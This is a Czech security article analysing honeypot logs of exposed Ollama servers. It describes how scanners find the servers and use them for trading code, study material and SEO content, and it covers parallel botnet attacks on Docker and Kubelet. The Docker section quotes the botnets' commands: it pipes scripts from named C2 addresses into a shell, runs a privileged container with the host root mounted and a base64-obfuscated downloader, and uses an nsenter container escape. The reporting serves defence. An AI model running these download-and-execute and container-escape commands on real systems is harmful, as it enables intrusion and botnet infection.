Zpět na domů

Zneužívání Ollama: trading a content-farmy

Článek analyzuje logy honeypotů otevřených instancí Ollama: průzkum, health-check, zneužívání pro trading, vzdělávání a SEO-obsah. Popsány paralelní útoky na Docker a Kubelet s escape-technikami. Uvedeny IOC, MITRE ATT&CK a opatření ochrany.

Ollama pod útokem: boty kradou GPU pro trading
Advertisement 728x90

Zneužití otevřených instancí Ollama: od obchodních robotů po farmy obsahu

Otevřené instance Ollama jsou využívány k generování kódu obchodních strategií, tvorbě vzdělávacího obsahu a masovému vytváření SEO textů. Výpadky byly zaznamenány v Německu, USA a Rusku – například požadavky na populární modely jako llama3.1:8b nebo qwen2.5:7b. Útočníci provádějí rozvědku, kontrolu funkčnosti a paralelní testování API koncových bodů před využitím cizího GPU.

Rozvědka a ověření dostupnosti

Skenery začínají základními požadavky pro ověření funkčnosti instance. Typické koncové body:

  • GET /api/tags – seznam dostupných modelů v Ollama API.
  • GET /v1/models – kompatibilní s OpenAI seznam modelů.
  • GET /api/version – verze serveru.

Na uzlu ve Spojených státech bylo během týdne zaznamenáno 244 požadavků /v1/models a 58 na /api/tags. Jeden IP adresu prováděl kontrolu každých 20 minut prostřednictvím POST /v1/chat/completions s hláškou {"messages": [{"role": "user", "content": "health-check"}]} – celkem 244 opakování.

Google AdInline article slot

Prohledávání modelů následuje určitý vzor: odeslání jednoduchého promptu Hello nebo hi na modely llama3.1:8b, qwen2.5:7b, codellama:13b, mistral:7b, deepseek:33b, llama3.2. Pokud model odpovídá, instance je označena jako vhodná.

Využití: typy úloh

Po dokončení rozvědky následují skutečné úkoly. Byly zaznamenány tři kategorie.

Obchodní roboti

Automatizovaný pipeline na americkém uzlu generuje kód strategie po dokončení health-checku:

Google AdInline article slot
{
  "messages": [{
    "role": "user",
    "content": "Write Python 3 code for:\ndef backtest_strategy(prices: list[float]) -> float:\nUse a 10-period fast SMA and 50-period slow SMA crossover on prices, long when fast > slow, flat/short when fast < slow, and return total PnL as a float. Output only that function, no extra text."
  }]
}

Prompt byl opakován 12krát na třech modelech prostřednictvím /api/chat, /v1/chat/completions, /v1/completions. Jedná se o systematický hledání bezplatného backendu pro algoritmický obchodování.

Proxy pro LLM klienty

Server v Číně: klient GLM předával historii rozhovoru, včetně system promptu a předchozích odpovědí. Požadavek na Anki kartičky o Maoově teorii o sporu: Make a 30-card Anki deck about Mao's theory of contradiction. Finální test: What model are you.

Farmy obsahu

Na ruském uzlu – šablonové prompty pro SEO:

Google AdInline article slot
Answer the following question thoroughly and in detail.

Question: How have neural networks and deep learning transformed AI?

RULES:
- Write a complete, detailed answer.
- Do NOT repeat the question.
- Do NOT add a preamble.
- Your LAST line must be exactly: ##ANSWER_DONE##

Answer:

Stop-slovo ##ANSWER_DONE## pro parser. Témata: strojové učení, evoluce AI. Paralelní odesílání na tři modely s řetězením myšlenek.

Paralelní útoky na infrastrukturu

Skenery Ollama kombinují s útoky na Docker (port 2375) a Kubelet (10250).

Docker exploity

Botnet docker.selfrep (C2: 31.57.216.121) provádí:

{
  "Cmd": ["sh", "-c",
    "(wget --no-check-certificate -qO- https://31.57.216.121/sh || curl -sk https://31.57.216.121/sh) | sh -s docker.selfrep"]
}

Nebezpečnější botnet (C2: 45.194.92.39) používá privilegované kontejnery:

{
  "Image": "alpine",
  "Cmd": ["sh", "-c", "echo d2dldCBodHRw...== | base64 -d | sh"],
  "HostConfig": {
    "Binds": ["/:/host"],
    "Privileged": true
  }
}

Alternativa – nsenter escape:

{
  "Cmd": ["nsenter", "--target", "1",
    "--mount", "--uts", "--ipc", "--net", "--pid",
    "--", "bash", "-c", "echo d2dldCBodHRw...== | base64 -d | sh"]
}

Rozvědka Kubeletu

Požadavky /api/v1/pods, /healthz a ML-specifický /update_weights_from_tensor ukazují na hledání datových toků.

Důležité informace

  • Otevřené instance Ollama jsou integrovány do plynulých procesů pro obchodování, vzdělávání a SEO bez ověření identity.
  • Health-check a prohledávání modelů (llama3.1, qwen2.5 atd.) jsou standardní pro automatizované skenery.
  • Útoky na Docker kombinují únik z kontejneru přes nsenter a privilegované připojení s base64 obfuskací.
  • Značky jako ##ANSWER_DONE## nebo health-check pomáhají detekovat farmy.
  • Ochrana vyžaduje lokální vázaní, reverse proxy a monitorování provozu.

— Editorial Team

Advertisement 728x90

Číst dál